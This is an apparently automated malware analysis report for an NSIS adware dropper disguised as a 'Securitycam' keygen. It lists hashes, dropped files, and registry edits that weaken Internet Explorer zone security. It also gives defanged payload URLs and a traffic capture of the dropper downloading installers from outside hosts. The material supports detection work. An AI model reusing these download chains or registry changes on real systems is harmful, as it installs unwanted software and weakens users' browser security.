Trojan.NSIS.StartPage_26e88f1bef
not-a-virus:HEUR:AdWare.Win32.AdLoad.heur (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 26e88f1bef9b9840ae1750b186b8810e
SHA1: f1ce7ff3aacfc346d77966f872a47a8a55da119b
SHA256: 4e0d926e39167561d56701b1b405dbc8cea621fd96e243439d5ab802eaf8b123
SSDeep: 49152:uB2LYJg/J Wvxq4/G9Ckr sFCD77qAG7Ez2M7gMeJ54:uELYJg/guG9CM PrGEz2OZ
Size: 2185144 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
RIzpib1Ppj.exe:1792
cpSetup.exe:1820
%original file name%.exe:320
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process RIzpib1Ppj.exe:1792 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\898984533 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\cpSetup.exe (15041 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp (0 bytes)
The process cpSetup.exe:1820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000753cb.a (1730 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BNHLLA5Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000747c5.a (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F2WM3BJ6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1PMKWJTD\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LNE6T972\desktop.ini (67 bytes)
The process %original file name%.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\FG (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\RIzpib1Ppj.exe (9088 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp (0 bytes)
Registry activity
The process RIzpib1Ppj.exe:1792 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 AE F7 E8 1D 76 12 51 4E E8 94 BC 27 B6 CA 4B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process cpSetup.exe:1820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F E5 C4 45 E9 F5 BF 90 F4 41 35 05 0A C2 32 EC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1460043952"
"Name" = "cpSetup.exe"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process %original file name%.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 36 21 BD A1 92 9D B3 CC B5 8D D1 AD 9E 17 87"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
| MD5 | File path |
|---|---|
| 37ac020b367a130c46db5d511c0a6aed | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\000747c5.a |
| 358bf4a361d2e1e0b0875ad2ad6ad58c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\000753cb.a |
| a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\NSISdl.dll |
| f7ad7316827d42f57fac47ec749f2090 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\RIzpib1Ppj.exe |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\System.dll |
| 7caaf58a526da33c24cbe122e7839693 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy4.tmp\NSISdl.dll |
| 1a0be57e956b7a3d9eff36f651a79286 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy4.tmp\cpSetup.exe |
| 89d40ecddf3ce6f3b0e6a84f40936912 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy4.tmp\nsArray.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 233472 | 33944 | 34304 | 3.96558 | 809fbe68a3bbe4aaa39970054ee410e5 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=4333077&pid=1505&n=U2VjdXJpdHljYW0gMS43LjAuNyBmaW5hbCBpbmNsIGtleWdlbiBjb3JlIFsyNDA3MTVCQVBd&b_typ=pe | |
| hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=4333077&pid=1505&b_typ=pe&reb=1&name=Securitycam 1.7.0.7 final incl keygen core [240715BAP] | |
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=1505&tid=4333077&b_typ=pe&n=U2VjdXJpdHljYW0gMS43LjAuNyBmaW5hbCBpbmNs&reb=1&ic= | |
| hxxp://dna4mm5c1mahl.cloudfront.net/?affId=1006&appTitle=Securitycam%201.7.0.7%20final%20incl&s1=1505&s2=4333077&setupName=cpSetup&appVersion=2.92&instId=11 | |
| hxxp://up2.dfiledownload28.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4333077&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=30218577&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4333077&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=30218577&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up2.dfiledownload28.space/offer.php?affId=1006&trackingId=30218577&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c3b2133&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up2.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c3b2133&trackingId=30218577&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c3b2133&trackingId=30218577&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up2.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c3b2133&trackingId=30218577&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1358&id[]=1359&id[]=1364&id[]=1365 | |
| hxxp://up2.dfiledownload28.spacehxxp://up2.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c3b2133&trackingId=30218577&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://get.dribbla.xyz/launch_reb.php?p=sevenzip&tid=4333077&pid=1505&n=U2VjdXJpdHljYW0gMS43LjAuNyBmaW5hbCBpbmNsIGtleWdlbiBjb3JlIFsyNDA3MTVCQVBd&b_typ=pe | |
| hxxp://up2.dfiledownload28.spacehxxp://up2.dfiledownload28.space/offer.php?affId=1006&trackingId=30218577&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c3b2133&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up.sdfuus98d7f.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4333077&b_typ=pe&n=U2VjdXJpdHljYW0gMS43LjAuNyBmaW5hbCBpbmNs&reb=1&ic= | |
| hxxp://get.gribbyk.space/?affId=1006&appTitle=Securitycam%201.7.0.7%20final%20incl&s1=1505&s2=4333077&setupName=cpSetup&appVersion=2.92&instId=11 | |
| hxxp://up.afiledownload27.spacehxxp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c3b2133&trackingId=30218577&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://capital.go2cloud.orghxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4333077&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=30218577&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://dl.wold3a.space/stub_maker.php?program=sevenzip&tid=4333077&pid=1505&b_typ=pe&reb=1&name=Securitycam 1.7.0.7 final incl keygen core [240715BAP] | |
| hxxp://up2.dfiledownload28.spacehxxp://up2.dfiledownload28.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4333077&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=30218577&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up2.dfiledownload28.spacehxxp://up2.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c3b2133&trackingId=30218577&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1358&id[]=1359&id[]=1364&id[]=1365 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET SHELLCODE Possible Call with No Offset TCP Shellcode
Traffic
GET hXXp://up2.dfiledownload28.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4333077&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=30218577&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4333077&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=30218577&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sat, 09 Apr 2016 08:19:00 GMT
Connection: close
Content-Length: 586<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=100
6&source=11&aff_sub=1505&aff_sub2=4333077&aff_sub3=0&a
mp;aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.
space/offer.php?affId={aff_id}&trackingId=30218577%2
6instId=11&ho_trackingid={transaction_id}&cc={
;country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&ua
c=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a&
gt;</body>..
GET hXXp://up2.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c3b2133&trackingId=30218577&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1358&id[]=1359&id[]=1364&id[]=1365 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sat, 09 Apr 2016 08:19:03 GMT
Connection: close
Content-Length: 449576.]n.-N*....i..."o...?...S.......\.|.R.......h.#..........c7OL..1.AwgK&
v...H..y..~....#R..*..q...#...[..P.V.y..U.'.x..d2..f...7...5..A.(...x.
u...qt'%|..0\........,t?H.~.%...yq......P......# ..U@...<rM...$ZdD.
...t%...EFU4~..5....U...Q....a.Pl...h.?......../<.`.q7In.5..i..lHG.
#.JJE.S.fu.F..8J/...`I.F%...K..k.....[..M.%e.$......&A...`gU.....n....
.].1.......-....g......H....*......KX3..=..s\.....e.J.s/....^B.S......
).7..#.O.....,w...}.r......a..=...*Gx.V...Oi..y.$.tc.I.e.d.7...."[email protected]
....s.../..z.vU28...L..u.N..j."N..........<...'.........N....TFh<
;.$. pN.. 7.t...V...z.a..7.0.<..b..5....0....u.K...85..."#..V...j.E
..D...ct..h.S..[..eG...kd....}..3|<.F.c..7MgX.Ge~7E...1....9..0)R..
f..........N._.........d....~.....Gp ..#..........id....q;...T.......1
.6....r.1.L......J...gw...F.[..F.;%[email protected]...^A\. f...v.IPJtO....
..K.Z~..|.XU.....q.8.l. ...d....I...c..<.E|2.....D.e..A.(..0O...Pk.
......~.....%>.Y.....~.........Z.Z.2{..5T......<.qYA......U.....
..^.......".pX9..JMs,....Z{.5..-.1..<....%\...^W...o........Z.,D...
Xu.z......iIN>X.F$j.!........aU.C...PX..3......Q..'_|.........j.~_&
lt;...,...(T..7.?..a.r..8.#w....JJ...y.B?..,..l...f..P.W"n..v....:...T
KW....(.*C...$.l..m.....I.p."..../....3.km...i.T.*....I....~........E.
.%S..~i.w.F.D.lM......k.... ......'.,.)cTm.*V.D.S<Q0Sd.{r.c.......\
.?.....)..TJ.....}j.....tq.........Q;._.jX.....^.e.h..otJdL.)a5.M.o.2.
/p.....4....G.z..]*A].YE..[....V W.....WTR.8f....O.7.f.h.k.&.{/g.....i
C..K...}\.l......Q...y."..6..H...=U..Z.....i.M.U(...........d....t<<< skipped >>>
GET /launch_reb.php?p=sevenzip&tid=4333077&pid=1505&n=U2VjdXJpdHljYW0gMS43LjAuNyBmaW5hbCBpbmNsIGtleWdlbiBjb3JlIFsyNDA3MTVCQVBd&b_typ=pe HTTP/1.0
Host: get.dribbla.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 165
Connection: close
Date: Sat, 09 Apr 2016 08:19:02 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)
X-Amz-Cf-Id: U80mqvCiFpOMJDC7rj4V1kYSeFJOs4BypHoC1f4W8ctEHcc9ZtpIJw==s=first..u=hXXp://dl.wold3a.space/stub_maker.php?program=sevenzip&tid=
4333077&pid=1505&b_typ=pe&reb=1&name=Securitycam 1.7.0.7 final incl ke
ygen core [240715BAP]..
GET /?affId=1006&appTitle=Securitycam%201.7.0.7%20final%20incl&s1=1505&s2=4333077&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.gribbyk.space
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 163840
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="cpSetup.exe"
Date: Sat, 09 Apr 2016 08:18:59 GMT
X-Cache: Miss from cloudfront
Via: 1.1 ecc0c6e7bd06eacf696003aa79e1e25a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: o4ZgYxRHo-9Ao6JH-tA86WMEc_EQCvBFZFBYV_v8_HAb0N9nLdLsUg==MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........H\...\...
\...Q...I...Q./.-....n..]...Q...u.......Y...\........n*.U...Q...]...\.
X.]....n..]...Rich\...........................PE..L......W............
..............................@.................................r.....
@.....................................<....`...Q...................
... ...................................8...@..........................
..................text............................... ..`.rdata...l...
....l..................@[email protected]...`7... [email protected]
rc....Q...`...R..................@[email protected].. ............j...........
[email protected]...............................................................
......................................................................
......................................................................
......................................................................
.....................................................xFB.............p
FB........;....tFB.......hp.A......Y.....h`.A......Y.....hP.A......Y..
...j.h..A.d.....P.. B.3.P.D$.d.......4B...u'.....4B.h..A..D$........4B
...A...........l4B..4B..L$.d......Y..........j.h..A.d.....P.. B.3.P.D$
.d.......4B...u'.....4B.h..A..D$........4B...A..2........x4B..4B..L$.d
......Y..........j.h..A.d.....P.. B.3.P.D$.d.......4B...u'.....4B.h..A
..D$........4B...A...........|4B..4B..L$.d......Y..........j.h..A.d...
..P.. B.3.P.D$.d.......4B...u'.....4B.h..A..D$........4B...A..R...<<< skipped >>>
GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4333077&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=30218577&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 09 Apr 2016 08:19:10 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up2.dfiledownload28.space/offer.php?affId=1006&trackingId=30218577&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c3b2133&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02834-102d50ab7e32accc6e9cee7c3b2133-1006-4-0-0-0-0-UA-0-3131-31353035-34333333303737-30-30-30-194.242.96.218-20160409041910-_-360472321A1D02366B1D7A47334E1851173026583125064A330F14382A78626B7B5E51640A664D6E11; expires=Mon, 09 May 2016 08:19:10 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Mon, 04 Mar 2019 18:59:10 GMT; path=/;
tracking_id: 102d50ab7e32accc6e9cee7c3b2133
X-Robots-Tag: noindex, nofollow
Content-Length: 439
Connection: Close<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a
href="hXXp://up2.dfiledownload28.space/offer.php?affId=1006&tracki
ngId=30218577&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c
3b2133&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac
=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a>
.</p>.</body></html>...<<< skipped >>>
GET hXXp://up2.dfiledownload28.space/offer.php?affId=1006&trackingId=30218577&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c3b2133&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sat, 09 Apr 2016 08:19:01 GMT
Connection: close
Content-Length: 76840j.J.OD........DL...T.).....y..k7.......e....,,...qX....k..Vy.I.C.s..W.
...>"A..~v...b...5.....bG...?g..<..G. .a. ..1.y..F.0(,.....68..G
7. ..&o.'.8S../NQ.r.......`r..g.../....Em.......C..T..k.........5W.)..
[email protected].*9.p..u_..`.bg.......U...")....(Md.b_..M0. -..M...kDM
.......^...K!...)..r.................:9.....~.Hq..}..1...[0.b..B.5}.l.
............E.........(.(H....s[.g..2.........^1.yhz...M_j..Y...(..$MJ
..|..p.J..>..h5.7w......<..k.c^!o............n.......S..k....o..
..<[.....vo.T.D.....3.?.f.."c................8.7\DnO..I..K.........
EOV\.`'M.....a.<....`d".=..6.>[email protected]..`.t..B.qR.E........*.%.
Uk.|.O.Py.ib..[..\..|........}...:.m9io.H.a....v.,iN..f'.~K."f.?.]7#)~
.tl..[.T........aJN...S..}u....Tr.G1z......<[email protected]
u0k9[.....h.....~6nC...L.S....%.#A..f)..TF..a...&X[........g.....x.\h.
m......F.=...<.tta..Z.t.b..../...7..$:N.h..bQ '?m.T.sA.....>$C..
.D?..>hd..9....k..ke........{.^..O.|.me#...]{.........{r.......r3.'
$.)(NI.d{ O......p..p.E[Wv ..>..X..K6x..O....5..E.2.......q..=.....
.,&iL..Q.|.S.6..K/`0...IYAj......e)... jZ.E.i. r.....e.Jr...>...Y].
Qw."..a.aS]4.....<....F....q...Kw.....2/.|..X...?.I\..o...`.o5.~.f
.]V...K.T6...w..~.o.Y..<..Ve......d...x.B.....86...I.A.}h.n....7Yw&
gt;....ib.L.H.....C.. {.....:..k&..\...R.........x^..J....2n...m.Iu.j.
......?l...c .......&.3IY.]......S..p....2*..M..;...Z<.....G.h..M.M
5.;|.{rWD......%... ..fhe.W......J$....A3....U3P.....IR.M....=..4.fvl.
...x.Ao..j.._.....k.=.....}....zc"Jo!...[.8N.)Y,[email protected]....<<< skipped >>>
POST hXXp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c3b2133&trackingId=30218577&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.afiledownload27.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1358&id[]=1359&id[]=1364&id[]=1365
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Sat, 09 Apr 2016 08:19:12 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 a71703bb7880a52614551015740610ad.cloudfront.net (CloudFront)
X-Amz-Cf-Id: bwaHeZCXP2SAcmC4jPfeH-G1a9BQ1pES7fbFCdLAgvV78EFo8G8Wag==<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
